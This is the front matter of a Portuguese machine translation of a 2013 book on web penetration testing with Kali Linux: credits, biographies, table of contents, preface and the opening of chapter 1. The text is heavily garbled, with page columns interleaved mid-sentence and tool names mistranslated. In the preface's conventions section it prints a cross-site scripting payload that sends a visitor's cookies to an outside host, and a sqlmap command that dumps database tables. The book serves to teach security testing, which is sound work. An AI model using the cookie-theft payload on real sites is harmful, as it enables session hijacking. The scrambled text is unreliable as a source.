Sie sind auf Seite 1von 112

empresas e produtos mencionados Monica Ajmera Mehta Mdia Deception na conferncia ASIS

neste livro atravs da utilizao Grficos Internacional de 2013, alto-falante


Teste de Invaso Web com adequada de capitais. Ronak Dhruv para Eliminar
KaliLinux No entanto, Packt Publishing no Coordenador de Produo Rede pontos cegos com webinar Data
Um guia prtico para a implementao pode garantir a preciso das Aditi Gajjar Center Segurana, alto-falante para
de testes de penetrao informaes. Capa Trabalho fazer Trazer
estratgias em sites, aplicaes web e Data de publicao: setembro 2013 Aditi Gajjar Seu prprio dispositivo (BYOD)
padro Referncia de Produo: 1180913 Christopher Smith Trabalhar no Solutions Forum
protocolos da web com Kali Linux. Publicado por Packt Publishing Ltd. Clyde Jenkins Governo, Washington
Jos Muniz Livery Lugar Coordenador do Projeto DC, e um artigo sobre a comprometer
Aamir Lakhani 35 Livery Rua Anugya Khurana senhas em PenTest Magazine -
BIRMINGHAM - MUMBAI Birmingham B3 2PB, Reino Unido. [FM-3] Backtrack
ISBN 978-1-78216-316-9 Compndio, julho de 2013.
Teste de Invaso Web com Kali Linux www.packtpub.com Sobre os autores Fora do trabalho, ele pode ser
Copyright 2013 Packt Publishing Cubra Imagem por Karl Moore Jos Muniz um arquiteto de encontrado por trs de toca-discos de
Todos os direitos reservados. (karl.moore @ ukonline.co.uk) solues tcnicas e de segurana vinil arranhando clssico ou no
Nenhuma parte deste livro pode ser [FM-2] pesquisador. Ele comeou o campo de futebol mexer com os
reproduzida, armazenada em um sua carreira em desenvolvimento de clubes locais.
sistema, ou transmitida de qualquer Crditos software e redes depois gerida como Este livro no poderia ter sido feito
forma ou por qualquer meio, sem a Autores um contratado sem o apoio da minha
prvia e por escrito Jos Muniz recurso tcnico. Joseph mudou-se encantadora esposa Ning e
permisso do editor, exceto no caso Aamir Lakhani para consultoria e descobriu uma inspiraes criativas da minha filha
de breves citaes embutidas em Revisores paixo por segurana Raylin. Eu tambm deve creditar a
artigos ou crticas. Revisores durante a reunio com uma variedade minha paixo por aprender a meu
Todo esforo foi feito na preparao Adrian Hayter de clientes. Ele esteve envolvido com irmo
deste livro para garantir a preciso Danang Heriyadi o projeto Alex, que me criou junto com meus
das informaes apresentadas. No Tajinder Singh Kalsi e implementao de vrios projetos pais amorosos Irene e Ray.
entanto, a informao contida neste Brian Sak que vo desde empresas Fortune 500 E eu gostaria de dar um
livro Kunal Sehgal para agradecimento final que a todos os
vendido sem garantia, expressa ou Nitin.K. Sookun (ISH) grandes redes federais. meus amigos,
implcita. Nem os autores, nem Packt Aquisio do Editor Joseph executado familiares e colegas que me apoiaram
Publishing, e os seus revendedores e Vinay Argekar TheSecurityBlogger.com site, um dos ao longo dos anos.
distribuidores sero responsveis por Editor Tcnico chumbo recursos mais populares sobre [FM-4]
quaisquer danos Amey Varangaonkar segurana e implementao do
causados ou supostamente causados Editores Tcnicos produto. Voc tambm pode encontrar Aamir Lakhani uma das principais
direta ou indiretamente por este livro. Pooja Arondekar Joseph falando em eventos ao vivo Cyber Security e Cyber Contra
Packt Publishing tem se esforado Sampreshita Maheshwari , bem como com outras publicaes arquiteto. Ele responsvel pelo
para fornecer informaes sobre Menza Mathew envolvido. Os acontecimentos fornecimento de solues de TI de
marca registrada de todos os Indexador recentes incluem alto-falante for Social segurana para grandes comercial
e organizaes empresariais federais. todo bom homem. " em seu blog em FuzzerByte Gostaria especialmente de agradecer
Lakhani lidera projetos que Eu gostaria de dedicar este livro aos (http://www.fuzzerbyte.com). Krunal Rajawadha (Autor
implementam posturas de segurana meus pais, e Mahmood Gostaria de agradecer aos meus pais Executivo de Relacionamento na
para empresas da Fortune 500, Nasreen, e irms, e Noureen Zahra. por me dar vida, sem eles, eu Packt Publishing) para vir atravs de
o Departamento de Defesa dos EUA, Obrigado por sempre no estaria aqui hoje, minha mim
os principais provedores de sade, incentivando o pequeno hacker mim. namorada para me apoiar cada dia atravs do meu blog e me oferecer
instituies de ensino, Eu no poderia ter feito isso sem com sorriso e amor, meus amigos, esta oportunidade. Gostaria tambm
e financeira e organizaes de mdia. seu apoio. Obrigado me e pai por que eu no posso descrever um por de agradecer minha famlia e
Lakhani projetou contra-ofensiva seus sacrifcios. Eu faria um. amigos ntimos para me apoiar
medidas de defesa para as agncias Tambm gosto tambm de agradecer Danang Heriyadi um pesquisador de quando eu estava
de defesa e inteligncia e aos meus amigos e colegas para o segurana de computadores indonsia trabalhando neste projeto.
organizaes tem assistido seu especializada Tajinder Singh Kalsi o co-fundador e
em defender-se do ataque ativo de incontvel encorajamento e [FM-6] Chief Technical Evangelist em
volta os ataques perpetrados por orientao. Estou verdadeiramente Virscent
metro abenoado para ser Technologies Pvt. Ltd, com mais de Brian Sak, CCIE # 14441,
grupos cibernticos. Lakhani trabalhando com as pessoas mais seis anos de experincia de trabalho atualmente um Arquiteto de Solues
considerado um lder na indstria de inteligentes e mais dedicadas do na rea de Tcnico da Cisco
apoio detalhado mundo. TI. Ele comeou sua carreira com Sistemas, onde ele est envolvido no
compromissos de arquitetura e [FM-5] WIPRO como Associate Tcnico, e desenvolvimento de solues e ajuda
projetos sobre tpicos relacionados mais tarde tornou-se os parceiros da Cisco
defesa ciberntica, mobile Sobre os Revisores Consultor cum instrutor de TI. A partir Construir e melhorar os seus servios
ameaas de aplicao, malware e e quebrar em aplicaes web. Ele de agora, ele realiza seminrios em de consultoria. Antes da Cisco, Brian
ameaas persistentes avanadas de possui um Mestrado licenciatura em faculdades em todo realizada segurana
pesquisa (APT), e Segurana da Informao ndia, sobre temas, tais como a Servios de consultoria e avaliao
Segurana das Trevas. Lakhani o e uma licenciatura Formado em segurana da informao, para grandes instituies financeiras,
autor e colaborador de vrios livros, e Cincia da Computao pela Royal desenvolvimento de aplicaes governo dos EUA
tem Holloway, Universidade de Londres. Android, Organismos e empresas da Fortune
apareceu na National Public Radio Adrian Hayter um testador de computing desenvolvimento de sites, e 500. Ele tem quase 20 anos de
como um especialista em Cyber penetrao com mais de 10 anos de nuvem, e cobriu mais de 100 indstria
Security. experincia em desenvolvimento faculdades Experincia com a maioria dos que
Escrevendo sob o pseudnimo de Dr. em engenharia e software explorao e cerca de 8500 estudantes, mais at passaram em Segurana da
Chaos, Lakhani tambm opera o reversa com mais de cinco anos mos agora. Alm de treinamento, ele Informao. Alm de
DrChaos.com na experincia. tambm mantm um blog Inmeras certificaes de segurana e
blogue. Em sua lista recente de 46 Ele est atualmente trabalhando em (www.virscent.com / blog), Que bate da indstria tcnicas, Brian tem um
federais Tecnologia Peritos para Siga Hatsecure como um instrutor para em vrios truques de hackers. Peg-lo mestrado
no Twitter, a Forbes "Exploit avanada e no facebook em-www.facebook.com / Em Segurana da Informao e
revista descreveu Aamir Lakhani como Shellcode Desenvolvimento ". Como tajinder.kalsi.tj ou seguir o seu Esfrance, e um contribuinte para o
"um blogueiro, especialista infosec, pesquisador, ele gosta de compartilhar stiowww.tajinderkalsi.com. Centro de
super-heri ... e o conhecimento de TI Segurana
Internet Security e outros livros e Oceano ndico, na bela ilha de [FM-8]
publicaes com foco em segurana. Maurcio. Ele comeou sua carreira de
[FM-7] computao www.PacktPub.com
como empresrio e fundou Indra Co. Arquivos de suporte, eBooks, ofertas Totalmente pesquisvel atravs de
O curso de segurana do ciberespao Ltd. Na busca de mais um desafio, ele de desconto e mais cada livro publicado pela Packt
da faculdade da Gergia (Canad), e entregou a gesto do negcio sobre a Voc pode querer visitar Copiar e colar, imprimir e contedo
tem sido sua famlia e se juntou Linkbynet www.PacktPub.com para os arquivos favorito
Associado com organizaes indiano de suporte e downloads relacionados On demand e acessvel via navegador
financeiras desde ento. Isso no s Oceano Ltd como Engenheiro de ao seu livro. Se voc tiver uma conta com a Packt
lhe deu sistema Unix / Linux. Ele atualmente Voc sabia que Packt oferece verses www.PacktPub.com, Voc pode usar
Experincia em um lugar onde a um engenheiro da Laranja e-book de todos os livros publicados, isso para o acesso
segurana crucial, mas tambm lhe Servios s empresas. com PDF PacktLib hoje e vista nove livros
forneceu Nitin tem sido um defensor openSUSE e arquivos disponveis ePub? Voc totalmente gratuitos. Basta usar suas
Valiosos conhecimentos desde 2009 e passa seu tempo livre pode atualizar para a verso e-book credenciais de login
especializados no campo. evangelizando Linux e FOSS. Ele em www.PacktPub. para acesso imediato.
Cunhal Segall (KunSeh.com) entrou um membro ativo de vrios grupos de com e como um cliente livro impresso, [FM-9]
no setor de segurana de TI aps a usurios voc tem direito a um desconto na Acesso gratuito para os titulares de
concluso e projetos de cdigo aberto, entre elas cpia eBook. contas Packt
Atualmente, ele dirige est dirigindo as openSUSE Project, MATE Project Entre em contato com a gente no
operaes de TI de segurana, para a Desktop, service@packtpub.com para mais ndice analtico
Regio APAC de um Fundao Software Livre, Linux User detalhes. Prefcio
Dos maiores bancos europeus. No Group de Maurcio, eo Maurcio Em www.PacktPub.com, Voc Captulo 1: Teste de Invaso e
geral, ele tem cerca de 10 anos de Artesanato de software comunitrio. tambm pode ler uma coleo de Configurao
experincia em diversas Ele gosta de scripting em Bash, Perl, e artigos tcnicos gratuitos, sinal Conceitos de testes de penetrao de
Funes que vo desde a avaliao Python, e geralmente publica seu -se para uma srie de boletins aplicativos Web
de vulnerabilidade, a governana de trabalho sobre informativos gratuitos e receber Metodologia Teste de Invaso
segurana e de seu blog. Seu mais recente trabalho descontos exclusivos e ofertas em Calculando risco
Avaliao de risco para "Projeto Evil Genius" um roteiro Packt Conceitos Kali Testes de Penetrao
monitoramento de segurana. Ele adaptado para porta / install livros e eBooks. Passo 1 - Reconhecimento
possui uma srie de certificaes para Ferramentas de Teste de Invaso em TM Etapa 2 - Avaliao Alvo
o seu openSUSE. Seus tutoriais so muitas http://PacktLib.PacktPub.com Passo 3 - Explorao
nomear, incluindo prpria OSCP do vezes traduzidos para vrios Voc precisa de solues imediatas Passo 4 - Privilege Escalation
Backtrack, e outros, como TCNA, lnguas e compartilhada dentro da para suas perguntas de TI? PacktLib Passo 5 - a manuteno de um ponto
CISM, comunidade open source. Nitin um est online de Packt de apoio
CCSK, Security +, roteador Cisco de pensador livre biblioteca de livros digitais. Aqui, voc Apresentando Kali Linux
Segurana, ISO 27001 LA, ITIL. e acredita em compartilhar pode acessar, ler e pesquisar em toda Configurao do sistema Kali
Nitin Sookun (MBCS) um nerd conhecimento. Ele gosta de socializar Packt Correndo Kali Linux a partir de uma
apaixonado que residem no corao com os profissionais de biblioteca de livros. mdia externa
de vrios campos. Por que assinar? Instalando Kali Linux
Kali Linux e VM imagem primeira 41 OWASP-Zap 123
corrida 41 Websploit 124
Viso geral ferramentas Kali Explorao 73
Resumo ndice analtico Metasploit 72
Objetivos de reconhecimento Postagens de emprego w3af Ataques do lado do cliente: Captulo 4
A pesquisa inicial Localizao Explorando os sistemas de e-mail A engenharia social
Site da empresa Shodan Ataques de fora bruta Engenharia Social Toolkit (SET)
Fontes de histria Web Google hackers Hidra Usando SET para clonar e ataque
Registros Regionais da Internet (RIRs) Google Hacking Banco de Dados DirBuster [Ii]
Eletrnico coleta de dados, anlise e Pesquisando redes WebSlayer 129
recuperao (EDGAR) Nmap Cracking senhas 129
Recursos de mdia social HTTrack - clonar um site John the Ripper 130
Confiana Tcnicas de reconhecimento de ICMP Man-in-the-middle 132
8 Tcnicas de reconhecimento DNS Tira SSL
9 Identificao do alvo DNS Resumo ndice analtico
14 Grficos de coleta de informaes - Resumo MitM Proxy
17 Maltego Iniciando o ataque - redirecionamento Hospedar digitalizao
17 FOCA - site metadados Configurando o redirecionamento de
18 Reconnaissance porta usando o Iptables Sumrio
19 41 74 Nenhuma entrada de sumrio foi
19 42 74 encontrada.
20 42 78
21 44 81
21 45 85 Hospedar digitalizao com Nessas
21 48 89 Obteno e rachaduras senhas de
22 49 95 usurios
29 52 96 As senhas do Windows
29 53 96 Kali quebra de senha ferramentas
31 55 102 Johnny
1 57 105 hashcat e oclHashcat
7 66 107 samdump2
Captulo 2: Reconhecimento 59 107 chntpw
33 Ataques do lado do servidor: Captulo 110 Ophcrack
34 3 113 Crunch
34 A avaliao da vulnerabilidade 119 Outras ferramentas disponveis no Kali
35 Webshag 119 Hash-identificador
36 Skipfish 121 dictstat
39 ProxyStrike 122 RainbowCrack (rcracki_mt)
40 Vega 127 findmyhash
phrasendrescher 184 Outras ferramentas 236
CmosPwd 187 urlsnarf 238
creddump 190 acccheck 240
Resumo 193 hexinject 242
Montagem do Windows 193 Patator 245
Senhas Linux 154 DBPwAudit 245
Instalando o Nessus em Kali 155 Resumo 246
Usando o Nessus 145 Explorao Navegador Quadro - 247
143 146 Carne 248
144 Autenticao Atacar: Captulo 5 FoxyProxy - Plugin do Firefox 248
145 Atacar o gerenciamento de sesses BURP Proxy 249
151 Clickjacking OWASP - ZAP 252
153 Cookies de sesso Sequestro web Colheita senha SET 253
155 Sesso de Ferramentas Web Fimap 254
156 Plugins do Firefox Negao de Servios (DoS) 254
159 Firesheep - Plugin do Firefox THC-SSL-DOS 256
161 Web Developer - Plugin do Firefox Scapy 196
161 Greasemonkey - Plugin do Firefox SlowLoris 198
165 Biscoito Injector - Plugin do Firefox Low Orbit Ion Canho 200
168 Os cookies Gestor + - Plugin do Outras ferramentas 203
170 Firefox DNSCHEF 204
170 Biscoito Cadger SniffJoke 205
171 Wireshark Cerco 206
172 Hamster e Ferret Inundator 208
173 Man-in-the-middle ataque TCPReplay 208
173 dsniff e arpspoof Resumo 209
173 175 Testando suas defesas 209
174 [Iii] Segurana da linha de base 210
174 STIG 210
177 ndice analtico O gerenciamento de patches 210
177 Captulo 6: Ataques Web As diretivas de senha Captulo 7: contramedidas defensivas
178 Ettercap 211 251
179 Emalhe 211 [Iv]
180 SQL Injection 216
180 SqlMap 218 ndice analtico
180 Cross-site scripting (XSS) 225 Espelhe o seu ambiente
181 Testando cross-site scripting 230 HTTrack
182 Cookie de XSS roubo / sequestro 234 Outras ferramentas de clonagem
183 Autenticao 235 Man-in-the-middle defesa
Defesa tira SSL Captulo 8: Teste de Penetrao 294 identificar e explorar vulnerabilidades
Negao de Servio defesa Relatrio Executivo [V] em
Defesa de Cookies Observncia sistemas. Este livro escrito
Defesa Clickjacking Os padres da indstria ndice analtico ferramentas de alavancagem
Forense digital Servios profissionais ndice disponveis em Kali Linux liberados
Kali Forensics Bota Documentao Declarao de Trabalho (SOW) 13 de maro, 2013, bem como outras
dc3dd Formato do relatrio Teste de Invaso Externa aplicaes de cdigo aberto.
Outras ferramentas forenses em Kali Capa Material adicional SOW Teste de Invaso Web com Kali Linux
chkrootkit Declarao de Confidencialidade Kali ferramentas de relatrios projetado para ser um guia para
Autpsia Controle de documentos Dradis profissionais
Binwalk Timeline KeepNote Testadores de penetrao que
pdf-parser Resumo executivo Maltego CaseFile procuram incluir Kali em uma
Principal Metodologia MagicTree penetrao de aplicaes web
Pasco Procedimentos de teste detalhadas CutyCapt noivado. Nosso objetivo identificar a
Bisturi Resumo dos resultados Exemplos de relatrios melhor ferramenta de Kali (s) para
bulk_extractor Vulnerabilidades Resumo uma tarefa especfica,
Anlise do Sistema de Arquivos com Consideraes de rede e 313 fornecer detalhes sobre como usar o
Kali recomendaes 295 aplicativo (s), e oferecem exemplos do
257 Apndices 296 que informaes
257 Glossrio 298 poderia ser obtida para fins de com
259 Resumo 300 base em experincia de campo
259 277 300 especialista relatrio. Kali tem
261 276 301 vrios programas e utilitrios, no
262 278 301 entanto, este livro vai concentrar-se na
263 279 301 ferramenta mais forte (s)
264 280 302 para uma tarefa especfica no
265 282 302 momento da publicao.
266 282 311 Os captulos deste livro so divididos
269 283 [Vi] em tarefas utilizados na aplicao web
271 283 do mundo real
271 284 Prefcio Teste de Invaso. Captulo 1, testes
271 284 Kali um arsenal Teste de Invaso de penetrao e de instalao,
274 285 baseado no Debian Linux usado por fornece uma viso geral
275 286 segurana Testes de Penetrao conceitos
275 288 profissionais (e outros) para realizar bsicos, estratgias de servios
275 289 avaliaes de segurana. Kali oferece profissionais, fundo
276 290 uma sobre o meio ambiente Kali Linux, ea
276 292 variedade de conjuntos de criao de Kali para temas
267 294 ferramentas personalizadas para apresentados neste livro.
Captulos 2-6, abrangem vrios Teste de Penetrao de outros comprometer a forma como os dados Penetrao ps relatrios de servio
aplicativos web conceitos de testes de servios, descrio da metodologia e so armazenados em sistemas host, e de teste profissionais. Os tpicos
penetrao, incluindo direcionamento man-in-the-middle ataque incluem uma viso geral
exemplos de configurao e relatrios aplicaes web. Este captulo tambm tcnicas. Este captulo tambm de mtodos para agregar valor ao seu
destinados a destacar temas fornece passos utilizados para aborda brevemente em SQL e produto final, a formatao do
abordados se pode configurar uma Kali ataques Cross-Site Scripting. documento e os modelos
realizar seu objetivo desejado. Ambiente Linux para tarefas Captulo 6, ataques na Web, explora que pode ser usado para construir
Captulo 7, contramedidas defensivas, abordados neste livro. como tirar proveito de servidores web relatrios profissionais.
serve como uma fonte de reparao Captulo 2, Reconhecimento, fornece e [2]
em sistemas vrias maneiras de coletar aplicaes web que utilizam exploits
vulnervel a ataques apresentados informaes sobre um de compromisso como a explorao Prefcio
nos captulos anteriores. Captulo 8, alvo. Os tpicos incluem ferramentas de navegador, procurao O que voc precisa para este livro
Teste de Penetrao gratuitas populares destacando ataques, e colheita de senha. Este Os leitores devem ter uma
Relatrio Executivo, oferece relatrios disponveis na Internet como captulo abrange igualmente os compreenso bsica de aplicaes
melhores prticas e exemplos que bem como a recolha de informao mtodos para interromper web, networking
podem servir como utilitrios disponveis em Kali Linux. servios utilizando tcnicas de conceitos e metodologia de testes de
modelos para a construo de Captulo 3, os ataques lado do negao de servio. penetrao. Este livro vai incluir
relatrios de nvel executivo. O servidor, centra-se na identificao e Captulo 7, contramedidas defensivas, detalhada
objetivo de projetar o livro em explorao de vulnerabilidades fornece as melhores prticas para o exemplos de como executar um
desta forma dar ao leitor um guia em servidores web e aplicaes. seu endurecimento ataque usando ferramentas oferecidas
para envolver uma penetrao de Ferramentas cobertos esto aplicaes web e servidores. Os em Kali Linux, bem como
aplicaes web disponveis em Kali ou outro aberto tpicos incluem linhas de base de outras aplicaes de cdigo aberto.
com a ferramenta melhor possvel (s) utilitrios de origem. segurana, gerenciamento de No necessrio, mas benfico ter
disponvel em Kali, oferecer medidas Captulo 4, Ataques lado do cliente, patches, experincia
para remediar uma vulnerabilidade alvos hospeda sistemas. Os tpicos polticas de senha, e defender-se usando verses anteriores do
e fornecer dados capturados como incluem a engenharia social, contra os mtodos de ataque Backtrack ou programas similares.
poderia ser apresentada de uma explorando vulnerabilidades do abordados no anterior Os requisitos de hardware para a
forma profissional. sistema host e atacando as senhas, captulos. Este captulo tambm inclui construo de um ambiente de
pois so os mais uma seo forense focados, pois laboratrio e criao da Kali
Prefcio meio comum para proteger os importante Arsenal Linux so abordados em
O que este livro cobre sistemas host. para investigar adequadamente um Captulo 1, testes de penetrao e de
Captulo 1, testes de penetrao e de Captulo 5, Atacar de autenticao, ativo comprometido para evitar Instalao.
instalao, abrange os fundamentos analisa a forma como os usurios e impacto negativo adicional. Que este livro para
da construo de uma dispositivos para autenticar web Captulo 8, Penetrao Teste O pblico-alvo deste livro so
prtica profissional Teste de Invaso. aplicaes. Os tpicos incluem a Relatrio Executivo, abrange as testadores de penetrao profissionais
Os tpicos incluem a diferenciao de segmentao do processo de melhores prticas para o ou outros
um gerenciamento de sesses de desenvolvimento de olhando para maximizar Kali Linux
autenticao, para um Teste de Invaso do servidor
web ou aplicao
exerccio. Se voc est procurando Novos termos e palavras importantes Embora tenhamos tomado todos os deparar com as cpias ilegais de
identificar como realizar um teste de so mostradas em negrito. As cuidados para garantir a exatido dos nossos trabalhos, sob qualquer forma,
penetrao contra palavras que voc v na nossos contedos, erros na internet, por favor
aplicaes web e achados a um tela, em menus ou caixas de dilogo, acontecem. Se voc encontrar um nos fornecer o endereo de
cliente uma forma profissional, em por exemplo, aparecem no texto erro em um dos nossos livros, talvez localizao ou nome do site
seguida, assim: "Em breve um erro no texto ou imediatamente para que possamos
este livro para voc. como ns, clique no Executar boto, o cdigo-ficaramos muito gratos se buscar um remdio.
Convenes ns recebemos uma injeo de SQL ". voc iria relatar isso para ns. Ao Entre em contato conosco
Neste livro, voc vai encontrar uma Avisos ou notas importantes fazer isso, voc pode copyright@packtpub.com com um link
srie de estilos de texto que aparecem em uma caixa como esta. salvar outros leitores de frustrao e para a suspeita
distinguem entre Dicas e truques aparecer assim. nos ajudar a melhorar as verses material pirateado.
diferentes tipos de informao. Aqui Feedback do leitor subseqentes deste Agradecemos a sua ajuda na proteo
esto alguns exemplos desses estilos, O feedback dos nossos leitores livro. Se voc encontrar qualquer de nossos autores, e nossa
e um sempre bem-vindo. Deixe-nos saber o errata, por favor informe-los visitando capacidade de trazer
explicao do seu significado. que voc pensa http://www.packtpub. voc um contedo valioso.
Palavras de cdigo no texto so Neste livro, o que voc gostou ou no com.br / submeter-errata, A seleo Perguntas
apresentados da seguinte forma: "Por gostou pode ter. Feedback do leitor de seu livro, clicando no formulrio de Voc pode contatar-nos em
exemplo, voc pode ligar para o perfil importante para o apresentao de errata link, questions@packtpub.com se voc
My First Scan ou qualquer outra coisa nos a desenvolver ttulos que voc e inserir os detalhes da sua errata. est tendo um problema
que voc gostaria. " realmente tirar o mximo proveito de. Uma vez que seu errata so com qualquer aspecto do livro, e ns
Um bloco de cdigo definido da Para nos enviar feedback geral, basta verificados, a sua submisso faremos o nosso melhor para resolv-
seguinte forma: enviar um e-mail para Sero aceitos ea errata ser lo.
<script> document.write ("<img src = feedback@packtpub.com, carregado no nosso site, ou [5]
'http://kali.drchaos.com/var/www/xss_ e mencionar o ttulo do livro atravs do adicionado a qualquer lista de
laboratrio / lab_script.php? "+ assunto da mensagem. errata existente, sob a seo Errata Teste de Invaso
document.cookie +"> ") </ script> Se existe um tema que voc tem desse ttulo. Qualquer errata existente e Configurao
Qualquer entrada de linha de experincia em e voc est pode ser visto Muitas organizaes oferecem
comando ou a sada escrita da interessado em qualquer escrita seleccionando o seu ttulo de servios de segurana e de uso de
seguinte forma: ou contribuir para um livro, consulte o http://www.packtpub.com/support. termos tais como auditoria de
SqlMap-u nosso guia autor em [4] segurana,
http://www.drchaous.com/article.php?i www.packtpub.com / autores. rede ou avaliao de risco, e
d=5 Atendimento ao Cliente Prefcio Penetration Test com significados
teste - despejo Errata Pirataria sobrepostos.
-U teste-dump Agora que voc o orgulhoso A pirataria de material com direitos Por definio, uma auditoria uma
-T-L tablesnamehere proprietrio de um livro Packt, temos autorais na internet um problema avaliao tcnica mensurvel de um
[3] uma srie de coisas para constante em todas as mdias. sistema (s) ou
ajud-lo a obter o mximo de sua No Packt, tomamos a proteo de aplicativo (s). As avaliaes de
Prefcio compra. nossos direitos autorais e licenas segurana so as avaliaes de risco,
muito a srio. Se voc ou seja, os servios
usado para identificar vulnerabilidades Verificador da penetrao pode est a trabalhar com o seu cliente servios, bem como orientaes para
em sistemas, aplicaes e processos. determinar toda a infra-estrutura de durante uma sesso de design para a construo de uma prtica
Teste de Invaso vai alm de uma segurana e associado desenvolver um escopo aceitvel profissional Teste de Invaso.
avaliao atravs da avaliao risco de um ativo valioso. de trabalho que no tem impacto Conceitos incluem diferenciar um teste
identificado O Teste de Invaso no tornar as sobre o valor dos resultados. de penetrao de outros servios, a
vulnerabilidades para verificar se a redes mais seguras! Teste de Invaso Web com Kali Linux- metodologia
vulnerabilidade real ou um falso o prxima gerao de BackTrack-se viso geral, e visando aplicaes web.
positivo. Por exemplo, Teste de Invaso e Configurao uma Este captulo tambm fornece uma
uma auditoria ou uma avaliao pode Esta uma m interpretao comum e hands-on guia que ir fornecer-lhe breve
utilizar ferramentas de verificao que deve ser claramente explicado a todos passo-a-passo mtodos para viso geral da criao de um teste de
fornecem algumas centenas os potenciais encontrar vulnerabilidades Kali Linux ou ambiente real.
possveis vulnerabilidades em vrios clientes. Teste de Invaso avalia a e explorao de aplicaes web. Este Teste de Invaso aplicao Web
sistemas. Um teste de penetrao eficcia da segurana existente. Se livro vai cobrir alvos pesquisando, conceitos
tentaria um cliente no tem uma forte identificando A aplicao web qualquer aplicativo
para atacar essas vulnerabilidades da segurana, em seguida, eles vo e explorao de vulnerabilidades em que usa um navegador web como um
mesma maneira como um hacker receber pouco valor a partir de aplicaes web, bem como os clientes cliente. Esta lata
malicioso para verificar Servios de testes de penetrao. que usam web ser um frum de mensagens simples
quais vulnerabilidades so genunos Como consultor, recomenda-se que a servios de aplicao, defendendo ou uma folha de clculo muito
reduzir a lista verdadeira das penetrao aplicaes web contra ataques complexo. As aplicaes web so
vulnerabilidades do sistema para Os servios de anlise so oferecidos comuns, e popular baseado na facilidade de
um punhado de falhas de segurana. como forma de verificar a segurana edifcio Teste de Invaso os produtos acesso a servios e gerenciamento
Os Testes de Penetrao mais para os sistemas existentes, uma vez para a prtica de servios centralizado de um sistema
eficazes so os que um cliente acredita que eles tenham profissionais. Ns utilizado por vrios partidos.
que visam um sistema muito esgotado todos os esforos para acredito que este livro timo para Requisitos para acessar um aplicativo
especfico, com um objetivo muito assegurar a esses sistemas e so quem est interessado em aprender web pode seguir
especfico. Qualidade sobre a pronto para avaliar se existem lacunas como se tornar um padres de cliente navegador indstria
quantidade existentes na obteno desses Verificador da penetrao, os usurios simplificar as expectativas, tanto do
o verdadeiro teste de um teste de sistemas. que so novos para Kali Linux e prestadores de servios, bem como os
penetrao bem-sucedida. Posicionando um escopo adequado querem aprender as caractersticas anfitries acessar o aplicativo.
Enumerando um nico sistema de trabalho fundamental quando a e as diferenas de Kali contra [8]
durante venda de servios de testes de BackTrack, e testadores de
um ataque direcionado revela mais penetrao. penetrao experientes que podem Captulo 1
sobre a segurana do sistema e O escopo do trabalho define o que os precisa de uma reciclagem ou de As aplicaes web so o tipo mais
tempo de resposta para lidar com sistemas e as aplicaes esto a ser referncia sobre novas ferramentas e utilizado de aplicaes dentro de
incidentes que ataque amplo espectro. alvo, bem como tcnicas. qualquer
Escolhendo cuidadosamente alvos o que conjuntos de ferramentas Este captulo vai quebrar os conceitos organizao. Eles so o padro para a
valiosos, uma podem ser usadas para comprometer fundamentais por trs vrios maioria das aplicaes baseadas na
vulnerabilidades que so encontradas. segurana Internet. Se voc olhar
Melhores prticas
em smartphones e tablets, voc vai todos os trs nveis. Outras reas de servem como ferramentas para o meio ambiente, pode ser difcil
descobrir que a maioria das avaliao que podem ser includos no melhorar uma sesso de design para estimar quanto tempo a fase de
aplicaes nesses dispositivos mbito da o desenvolvimento de um escopo de reconhecimento
tambm so aplicaes web. Isso trabalho so como os dispositivos so trabalho. vai durar. Isso geralmente apresenta
criou uma superfcie rica em alvo novo obtidos por funcionrios, como os Metodologia Teste de Invaso um problema de faturamento. Os
e grande para dispositivos so usados fora de H passos lgicos recomendados clientes, na maioria dos casos, no
profissionais de segurana, bem como acessar o aplicativo, a rede (s) para a realizao de um teste de so
os atacantes exploram esses circundante, a manuteno dos penetrao. O primeiro disposto a assinar um cheque em
sistemas. sistemas, passo identificar o status de iniciar o branco para voc gastar tempo e
Aplicaes web de teste de e os usurios dos sistemas. Alguns projeto. A terminologia mais comum recursos ilimitados em
penetrao podem variar em escopo exemplos de por que essas outras definindo o estado de partida Caixa- a fase de reconhecimento, no entanto,
j que h um grande nmero reas de abrangncia preta teste, Caixa branca teste, ou se voc no passar o tempo
de tipos de sistema e os casos de uso assunto est tendo o servidor Linux uma mistura necessrio, em seguida, o seu
de negcios para servios de comprometida, permitindo conexo a entre branco e preto teste de caixa Penetration Test acabou antes de
aplicativos web. O ncleo da web partir de um conhecido como Caixa cinza teste. comear. Tambm irrealista porque
camadas de aplicaes que so dispositivo mvel infectado por outros [9] um motivado
servidores de hospedagem, meios ou a obteno de um atacante no ter, necessariamente,
dispositivos de acesso e depsito de dispositivo mvel autorizado Teste de Invaso e Configurao os mesmos de escopo e de
dados atravs de mdias sociais para Caixa preta assume o verificador da faturamento restries na
deve ser testada, juntamente com a capturar informaes confidenciais. penetrao no tem conhecimento Tester Penetrao profissional. por
comunicao entre as camadas Ns inclumos modelos para definir o prvio do alvo isso que recomendamos caixa cinza
durante uma teia escopo de uma penetrao de rede, os processos da empresa, ou sobre
exerccio Teste de Invaso aplicao. aplicaes web em Captulo servios que fornece. Iniciando um Teste de caixa preta.
Um exemplo para o desenvolvimento 8, Penetrao Teste Relatrio projeto de caixa preta Caixa branca quando um verificador
de um escopo para um teste de Executivo. Alguns exemplos requer uma grande quantidade de da penetrao tem conhecimento
penetrao de aplicaes web o Deliverable nesta oferta captulo reconhecimento e, tipicamente, um ntimo sobre o sistema.
teste levantamentos checkbox que podem acoplamento mais com base no Os objetivos do teste de penetrao
aplicaes de um servidor Linux de ajudar com andar um cliente atravs conceito que os atacantes do mundo so claramente definidos e os
hospedagem para dispositivos mveis. de possveis alvos real podem passar longos perodos de resultados do relatrio
O escopo do trabalho em um para uma aplicao web mbito Teste tempo estudando alvos a partir do teste normalmente
mnimo deve incluir a avaliao do de Invaso de trabalho. Cada escopo antes de lanar ataques. esperado. O testador foi fornecido
servidor Linux (sistema operacional, do trabalho deve Como um profissional de segurana, com detalhes sobre
rede ser personalizado em torno de encontramos testes de caixa preta o alvo, tais como informaes sobre a
configurao, e assim por diante), as objetivos de negcio do seu cliente, apresenta alguns problemas quando rede, o tipo de sistemas, processos da
aplicaes alojadas no servidor, como prazo esperado de escopo um teste de penetrao. empresa, e
os sistemas e desempenho, recursos alocados, e Dependendo do sistema e sua servios. Teste de caixa branca,
usurios autenticados, dispositivos resultado desejado. Como afirmado familiaridade com tipicamente focada em um objetivo
clientes que acessam o servidor ea anteriormente, os modelos de negcio especfico
comunicao entre
, tais como a uma necessidade download de ferramentas e execut- Atacantes de verdade no tem limites, Prazo do trabalho realizado: Quando o
